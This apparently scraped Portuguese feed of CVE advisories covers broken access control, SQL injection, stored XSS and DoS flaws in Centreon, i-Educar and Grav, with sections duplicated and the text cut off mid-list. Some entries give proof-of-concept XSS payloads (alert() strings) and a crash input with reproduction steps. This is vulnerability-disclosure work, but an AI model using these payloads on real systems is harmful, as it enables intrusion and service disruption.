id="cve-2025-15026-controle-de-acesso-quebrado">CVE-2025-15026: Controle de Acesso Quebrado </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-15026" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-15026</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">A vulnerabilidade "Falta de autenticação para função crítica" no Centreon Infra Monitoring (módulo de importação Awie "centreon-awie") permite o acesso a funcionalidades não devidamente restringidas pelas ACLs.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p><h2 id="cve-2025-15026-controle-de-acesso-quebrado">CVE-2025-15026: Controle de Acesso Quebrado </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-15026" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-15026</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">A vulnerabilidade "Falta de autenticação para função crítica" no Centreon Infra Monitoring (módulo de importação Awie "centreon-awie") permite o acesso a funcionalidades não devidamente restringidas pelas ACLs.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-15029/ https://www.cvehunters.com/pt/p/cve-2025-15029/ <h2 id="cve-2025-15029-injeção-sql">CVE-2025-15029: Injeção SQL </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-15029" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-15029</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário não autenticado pode introduzir injeção de SQL usando o módulo de exportação AWIE.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p><h2 id="cve-2025-15029-injeção-sql">CVE-2025-15029: Injeção SQL </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-15029" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-15029</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário não autenticado pode introduzir injeção de SQL usando o módulo de exportação AWIE.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-12514/ https://www.cvehunters.com/pt/p/cve-2025-12514/ <h2 id="cve-2025-12514-injeção-sql">CVE-2025-12514: Injeção SQL </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12514" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12514</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode introduzir uma injeção de SQL usando os parâmetros de configuração das regras de notificação de tickets abertos.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p><h2 id="cve-2025-12514-injeção-sql">CVE-2025-12514: Injeção SQL </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12514" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12514</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode introduzir uma injeção de SQL usando os parâmetros de configuração das regras de notificação de tickets abertos.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 22 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54890/ https://www.cvehunters.com/pt/p/cve-2025-54890/ <h2 id="cve-2025-54890-cross-site-scripting-xss-armazenado">CVE-2025-54890: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54890" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54890</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração do Hostgroups.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p><h2 id="cve-2025-54890-cross-site-scripting-xss-armazenado">CVE-2025-54890: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54890" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54890</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração do Hostgroups.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 22 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8460/ https://www.cvehunters.com/pt/p/cve-2025-8460/ <h2 id="cve-2025-8460-cross-site-scripting-xss-armazenado">CVE-2025-8460: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8460" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8460</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de neutralização inadequada de entrada durante a geração de páginas da web (XSS ou 'Cross-site Scripting') no Centreon Infra Monitoring (regras de notificação, módulo de tickets abertos) permite a execução de XSS armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring nas versões 24.10.0 a 24.10.5, 24.04.0 a 24.04.5 e 23.10.0 a 23.10.4.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p><h2 id="cve-2025-8460-cross-site-scripting-xss-armazenado">CVE-2025-8460: Cross-Site Scripting (XSS) Armazenado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8460" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8460</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de neutralização inadequada de entrada durante a geração de páginas da web (XSS ou 'Cross-site Scripting') no Centreon Infra Monitoring (regras de notificação, módulo de tickets abertos) permite a execução de XSS armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring nas versões 24.10.0 a 24.10.5, 24.04.0 a 24.04.5 e 23.10.0 a 23.10.4.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8460-centreon-open-tickets-medium-severity-5344" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8460-centreon-open-tickets-medium-severity-5344</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 22 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9638/ https://www.cvehunters.com/pt/p/cve-2025-9638/ <h2 id="cve-2025-9638-cross-site-scripting-xss-armazenado-no-painel-administrativo">CVE-2025-9638: Cross-Site Scripting (XSS) Armazenado no Painel Administrativo </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9638" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9638</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>educar_usuario_cad.php</code> do aplicativo i-Educar. O problema ocorre porque o parâmetro <code>matricula_interna</code> não é higienizado antes de ser armazenado no banco de dados. Scripts maliciosos injetados nesse campo persistem no sistema e são executados sempre que o registro afetado é exibido na interface web, levando a uma vulnerabilidade persistente no lado do cliente.</p><h2 id="cve-2025-9638-cross-site-scripting-xss-armazenado-no-painel-administrativo">CVE-2025-9638: Cross-Site Scripting (XSS) Armazenado no Painel Administrativo </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9638" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9638</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>educar_usuario_cad.php</code> do aplicativo i-Educar. O problema ocorre porque o parâmetro <code>matricula_interna</code> não é higienizado antes de ser armazenado no banco de dados. Scripts maliciosos injetados nesse campo persistem no sistema e são executados sempre que o registro afetado é exibido na interface web, levando a uma vulnerabilidade persistente no lado do cliente.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>educar_usuario_cad.php</code></p> <p>Parâmetro: <code>matricula_interna</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">><</span><span class="n">svg</span><span class="o">/</span><span class="n">onload</span><span class="o">=</span><span class="n">alert</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"> <ul> <li>Faça login com uma conta que possa criar ou editar usuários.</li> <li>Navegue até Configurações → Permissões → Usuários.</li> <li>Crie um novo usuário ou edite um existente.</li> <li>No campo Matrícula Interna, insira o payload.</li> <li>Salve as alterações.</li> </ul> </p> <p><img src="/p/cve-2025-9638/image.png" width="1630" height="851" srcset="/p/cve-2025-9638/image_hu_cc7ec697ae4e70f7.png 480w, /p/cve-2025-9638/image_hu_555dd8de909d4f60.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <p style="text-align: justify;"> <ul> <li>Abra o registro do usuário afetado.</li> <li>O payload é executado imediatamente, confirmando o XSS armazenado.</li> </ul> </p> <p><img src="/p/cve-2025-9638/image-1.png" width="1278" height="689" srcset="/p/cve-2025-9638/image-1_hu_2f16889c8f63d68d.png 480w, /p/cve-2025-9638/image-1_hu_e3a35d5e25fb0aad.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="445px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://fluidattacks.com/pt/advisories/travis" target="_blank" rel="noopener" >https://fluidattacks.com/pt/advisories/travis</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 09 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-66305/ https://www.cvehunters.com/pt/p/cve-2025-66305/ <h2 id="cve-2025-66305-negação-de-serviço-devido-ao-tratamento-inadequado-de-entrada-no-parâmetro-supported">CVE-2025-66305: Negação de serviço devido ao tratamento inadequado de entrada no parâmetro <code>Supported</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66305" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66305</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Negação de Serviço (DoS) foi identificada no submenu <b>"Idiomas"</b> do painel de <b>configuração administrativa</b> do Grav (<code>/admin/config/system</code>). Especificamente, o parâmetro <code>Supported</code> não valida corretamente a entrada do usuário. Se um valor malformado for inserido — como uma única barra (<code>/</code>) ou uma string de teste XSS — isso causa um erro fatal de análise de expressão regular no servidor.</p><h2 id="cve-2025-66305-negação-de-serviço-devido-ao-tratamento-inadequado-de-entrada-no-parâmetro-supported">CVE-2025-66305: Negação de serviço devido ao tratamento inadequado de entrada no parâmetro <code>Supported</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66305" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66305</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Negação de Serviço (DoS) foi identificada no submenu <b>"Idiomas"</b> do painel de <b>configuração administrativa</b> do Grav (<code>/admin/config/system</code>). Especificamente, o parâmetro <code>Supported</code> não valida corretamente a entrada do usuário. Se um valor malformado for inserido — como uma única barra (<code>/</code>) ou uma string de teste XSS — isso causa um erro fatal de análise de expressão regular no servidor.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo constrói dinamicamente uma expressão regular usando o conteúdo do campo <code>Supported</code> sem escapar a entrada usando <code>preg_quote()</code> ou validação adequada. Isso permite que atacantes injetem sintaxe inválida no mecanismo de expressões regulares, causando a falha do aplicativo durante a resolução de idioma.</p> <h3 id="mensagem-de-erro">Mensagem de erro: </h3><p><code>Whoops \ Exception \ ErrorException (E_WARNING) preg_match(): Modificador desconhecido 'o' /system/src/Grav/Common/Language/Language.php244</code></p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>POST /admin/config/system</code></p> <p>Submenu: <code>Languages</code></p> <p>Parâmetro: <code>Supported</code></p> <p style="text-align: justify;"> <ul> <li>Faça login no Painel de Administração do Grav.</br> <li>Navegue até: <b>Configuração → Sistema → Idiomas</b>.</li> <li>Localize o campo <code>Suported</code>.</li> <li>Insira um payload (por exemplo, uma única barra <code>/</code>).</li> <li>Clique em <b>Salvar</b>.</li> </ul> </p> <p><img src="/p/cve-2025-66305/image.png" width="1897" height="639" srcset="/p/cve-2025-66305/image_hu_c3420762a046330d.png 480w, /p/cve-2025-66305/image_hu_3d12dcd60c603267.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="296" data-flex-basis="712px" /></p> <p style="text-align: justify;"> <ul> <li>Observe: Todas as páginas do aplicativo começam a exibir um erro fatal e ficam inacessíveis.</li> </ul> </p> <p><img src="/p/cve-2025-66305/image-1.png" width="1802" height="998" srcset="/p/cve-2025-66305/image-1_hu_3cf5c52544b0b6fa.png 480w, /p/cve-2025-66305/image-1_hu_379d1b4d6d7e7b50.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="180" data-flex-basis="433px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Ataque de Negação de Serviço (DoS) em toda a aplicação.</li> <li>Todas as telas de login e administração travam com o mesmo erro.</li> <li>Potencialmente explorável por: Usuários do painel de administração; CSRF se configurado incorretamente.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-66308/ https://www.cvehunters.com/pt/p/cve-2025-66308/ <h2 id="cve-2025-66308-cross-site-scripting-xss-armazenado-no-parêmetro-datataxonomies-do-endpoint-adminconfigsite">CVE-2025-66308: Cross-Site Scripting (XSS) Armazenado no Parêmetro <code>data[taxonomies]</code> do Endpoint <code>/admin/config/site</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66308" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66308</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>/admin/config/site</code> do aplicativo <i>Grav</i>. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>data[taxonomies]</code>. O payload injetado é armazenado no servidor e executado automaticamente no navegador de qualquer usuário que acesse a configuração do site afetado, resultando em um vetor de ataque persistente.</p><h2 id="cve-2025-66308-cross-site-scripting-xss-armazenado-no-parêmetro-datataxonomies-do-endpoint-adminconfigsite">CVE-2025-66308: Cross-Site Scripting (XSS) Armazenado no Parêmetro <code>data[taxonomies]</code> do Endpoint <code>/admin/config/site</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66308" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66308</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>/admin/config/site</code> do aplicativo <i>Grav</i>. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>data[taxonomies]</code>. O payload injetado é armazenado no servidor e executado automaticamente no navegador de qualquer usuário que acesse a configuração do site afetado, resultando em um vetor de ataque persistente.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>POST /admin/config/site</code></p> <p>Parâmetro: <code>data[taxonomies]</code></p> <p style="text-align: justify;">O aplicativo não valida ou higieniza corretamente a entrada no campo <code>data[taxonomies]</code>. Como resultado, um atacante pode injetar código JavaScript, que é armazenado na configuração do site e posteriormente renderizado na interface administrativa ou na saída do site, causando execução automática no navegador do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">"><script>alert('XSS-PoC')</script> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"> <ul> <li>Faça login no Painel de Administração do <i>Grav</i> com permissões suficientes para modificar a configuração do site.</li> <li>Navegue até <b>Configuração > Site</b>.</li> <li>No campo <b>Tipos de Taxonomias</b> (que corresponde a <code>data[taxonomies]</code>), insira o payload.</li> <li>Salve a configuração.</li> </ul> </p> <p><img src="/p/cve-2025-66308/image.png" width="1897" height="628" srcset="/p/cve-2025-66308/image_hu_2db52fe672979960.png 480w, /p/cve-2025-66308/image_hu_3b02d8d0dfaa4c28.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="302" data-flex-basis="724px" /></p> <p style="text-align: justify;"> <ul> <li>Acesse as Páginas e clique em uma delas.</li> </ul> </p> <p><img src="/p/cve-2025-66308/image-1.png" width="932" height="587" srcset="/p/cve-2025-66308/image-1_hu_31314f0d34cb0fe9.png 480w, /p/cve-2025-66308/image-1_hu_b304d93e6237dbae.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="158" data-flex-basis="381px" /></p> <p style="text-align: justify;"> <ul> <li>O payload armazenado é executado imediatamente no navegador, confirmando a vulnerabilidade XSS armazenada.</li> </ul> </p> <p><img src="/p/cve-2025-66308/image-2.png" width="1204" height="377" srcset="/p/cve-2025-66308/image-2_hu_44fbaf72eed9e907.png 480w, /p/cve-2025-66308/image-2_hu_3e2f9566dc2c6480.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="319" data-flex-basis="766px" /></p> <p style="text-align: justify;"> <ul> <li>A requisição HTTP enviada durante este processo contém o parâmetro e o payload vulneráveis:</li> </ul> </p> <p><img src="/p/cve-2025-66308/image-3.png" width="757" height="675" srcset="/p/cve-2025-66308/image-3_hu_862cece54be2132a.png 480w, /p/cve-2025-66308/image-3_hu_377bd8a8e99a5dbb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="112" data-flex-basis="269px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> 